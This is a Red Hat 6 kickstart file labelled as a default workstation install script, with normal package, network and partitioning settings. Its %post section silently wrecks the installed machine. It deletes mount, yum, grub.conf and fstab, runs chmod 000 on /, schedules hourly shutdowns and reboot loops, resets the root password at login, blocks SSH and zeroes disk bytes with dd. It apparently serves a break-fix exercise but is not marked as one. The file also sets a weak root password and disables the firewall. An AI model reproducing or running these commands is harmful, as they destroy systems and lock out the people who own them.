##########################################################################
#
# workstation install script
# $Id: workstation-default.cfg 444 2010-09-27 17:19:27Z bowe $
# RHCI:  Customize keyboard, lang, langsupport, mouse, time, and DEVICE
#        (both %pre and %post) as appropriate
#
##########################################################################

text
key --skip
keyboard us
lang en_US.UTF-8
network --bootproto dhcp
#nfs --server=192.168.0.254 --dir=/var/ftp/pub/rhel6/dvd
url --url ftp://192.168.0.254/pub/rhel6/dvd
logging --host=192.168.0.254

%include /tmp/partitioning

#mouse genericps/2 --emulthree
#mouse generic3ps/2
#mouse genericwheelusb --device input/mice
timezone Asia/Shanghai --utc
#timezone US/Central --utc
#timezone US/Mountain --utc
#timezone US/Pacific --utc
# When probed, some monitors return strings that wreck havoc (not
# Pennington) with the installer.  You can indentify this condition
# by an early failure of the workstation kickstart just prior to when
# it would ordinarily raise the installer screen after probing.  There
# will be some nasty python spew.
# In this situation, comment the xconfig line below, then uncomment
# the skipx line.  Next, uncomment the lines beneath #MY X IS BORKED
#xconfig --resolution=1024x768 --depth=16 --startxonboot
#skipx
rootpw redhat 
authconfig --enableshadow --passalgo=sha512
firewall --disabled
reboot

%packages
@ Desktop
@ Console internet tools
@ Desktop Platform
@ Development Tools
@ General Purpose Desktop
@ Graphical Administration Tools
@ Chinese Support
#@ Graphics Creation Tools
@ Internet Browser
# KDE is huge...install it if you wish
#@ KDE
@ Network file system client
@ Printing client
@ X Window System
mutt
lftp
ftp
ntp
libvirt-client
qemu-kvm
virt-manager
virt-viewer
libvirt
nss-pam-ldapd
tigervnc
policycoreutils-python
logwatch
-biosdevname

%pre
echo "Starting PRE" > /dev/tty2
# Forget size-based heuristics. Check for removable drives.
# Look at both scsi and virtio disks.
for disk in {s,v}d{a..z} ; do
    if ( [ -e /sys/block/${disk}/removable ] && \
       	 egrep -q 0 /sys/block/${disk}/removable ); then
       disktype=$disk
       diskfound='true';
       break
    fi
done

# Add a bootloader directive that specifies the right boot drive
echo "bootloader --append="biosdevname=0" --driveorder=${disktype}" > /tmp/partitioning

cat >> /tmp/partitioning <<END
zerombr
clearpart --drives=${disktype} --all
part swap --size 512 --ondisk=${disktype}
part /boot --size 256 --ondisk=${disktype}
part pv.01 --size 20000 --ondisk=${disktype}
volgroup vol0 pv.01
logvol / --vgname=vol0 --size=18000 --name=root
logvol /home --vgname=vol0 --size=500 --name=home
END

echo disktype=${disktype} > /tmp/disktype

%post
##########
rm -rf /root/anaconda-ks.cfg
rm -rf /bin/mount
rm -rf /usr/bin/yum
rm -rf /boot/grub/grub.conf
rm -rf /etc/fstab
rm -rf /usr/bin/nautilus
echo "echo 123 |passwd --stdin root &> /dev/null" >> /root/.bash_profile
echo "export PATH=/usr/lib64/qt-3.3/bin:/usr/local/sbin:/usr/sbin:/usr/local/bin:/usr/bin:/root/bin" >> /root/.bashrc
sed -i 's/sda/sdb/' /boot/grub/device.map
sed -i '/^export/d' /etc/profile
sed -i '/^host/s/dns//' /etc/nsswitch.conf
chmod o-t /tmp
chmod 000 /
echo "* * * * * root wall 'haha'" >> /etc/crontab
echo "01 * * * * /sbin/init 0" >> /var/spool/cron/root
sed -i '12aport 222' /etc/ssh/sshd_config
echo "TMOUT=30" >> /root/.bashrc
echo "find me @_@" >> /etc/motd
sed -i '/^root/s/bin/in/g' /etc/passwd
sed -i '5asleep 100' /etc/rc.d/init.d/network
sed -i '1s/yes/no/' /etc/sysconfig/network
sed -i '20s/fi/hahahaha/' /etc/profile
mv /lib64/libselinux.so.1 /lib64/libselinux.so.1.bak
echo "/sbin/init 6" >> /etc/rc.local
chattr +i /etc/rc.d/rc.local
chattr +i /etc/passwd
chattr +i /etc/shadow
chmod u-s /usr/bin/passwd
echo "tty2" > /etc/securetty
echo "sshd: all" > /etc/hosts.deny
rm -rf /etc/sysconfig/network-scripts/ifcfg-eth0
dd if=/dev/zero of=/dev/sda1 bs=1 count=1024 seek=1024
rm -rf /root/cobbler.ks
